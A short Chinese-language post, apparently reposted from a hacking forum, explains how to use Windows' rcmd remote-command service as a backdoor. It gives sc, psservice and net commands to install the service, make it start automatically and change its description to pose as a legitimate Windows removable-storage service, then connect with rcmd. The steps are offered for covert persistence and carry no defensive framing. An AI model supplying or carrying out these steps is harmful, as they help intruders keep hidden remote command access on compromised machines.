windows自带的rcmd后门使用方法整理 's

admin 2017年4月30日12:30:30评论475 views字数 478阅读1分35秒阅读模式
摘要

文章作者:pt007[at]vip.sina.com版权所有,转载请注明
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

文章作者:pt007[at]vip.sina.com版权所有,转载请注明
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

1、rcmdsvc /install //安装后的服务名为:Remote Command Service (rcmdsvc),建议上传至windows目录
怎么用命令行改服务名和描述:
sc //127.0.0.1 query rcmdsvc //查询整个服务
sc //127.0.0.1 qdescription rcmdsvc //查询服务的描述
sc //127.0.0.1 description rcmdsvc "管理和编录可移动媒
体并操作自动化可移动媒体设备。如果这个服务被停止,依赖可移动存储的程序,如备份和
远程存储将放慢速度。如果禁用这个服务,所有专依赖这个服务的服务将无法启动。" //修改服务的描述
D:/pt007/f/Pstools2.11>psservice //127.0.0.1 setconfig rcmdsvc auto //设置服务为自动启动
2、net start rcmdsvc
3、rcmd //127.0.0.1 ver

rcmd.zip

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月30日12:30:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   windows自带的rcmd后门使用方法整理 'shttps://cn-sec.com/archives/49486.html

发表评论

匿名网友 填写信息